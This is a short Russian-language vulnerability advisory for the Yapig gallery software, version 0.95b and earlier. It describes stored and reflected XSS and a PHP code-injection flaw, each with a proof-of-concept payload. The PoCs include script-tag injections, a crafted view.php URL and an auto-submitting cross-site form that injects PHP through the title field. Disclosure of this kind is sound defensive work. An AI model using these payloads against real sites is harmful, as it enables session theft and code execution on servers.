Программа: Yapig 0.95b и более ранние версии 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей, а также выполнить произвольный PHP сценарий на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в поле Website формы Homepage. 

Пример: 

«><script>alert(‘hi’)</script> 

2. Уязвимость существует при обработке параметра img_size в сценарии view.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости должна быть включена опция register_globals.

Пример: 

http://your-server/path-to-yapig/view.php?gid=1& phid=1&img_size=><script>alert(‘hi’)</script> 

3. Удаленный пользователь может c помощью специально сформированной формы внедрить и выполнить произвольный PHP сценарий на целевой системе. Для удачной эксплуатации уязвимости требуется участие пользователя с административными привилегиями в приложении. 

Пример:

<form method=»post» action="http://your-server/path-to-yapig/ yapig095b/modify_gallery.php?action=
mod_info&amp;gid=1″>
<input value=’TestGallery»; echo «evil’ name=»title» type=»text»>
<input value=»TestAuthor» name=»author» type=»text»>
<input value=»TestDate» name=»date» type=»text»> 
<input value=»» name=»dir» type=»text»>
<input value=»TestDescription» name=»desc» type=»text»>
<input type=»submit»>
</form> 

<script type=»text/javascript»>
document.forms[0].submit();
</script>



Оставить мнение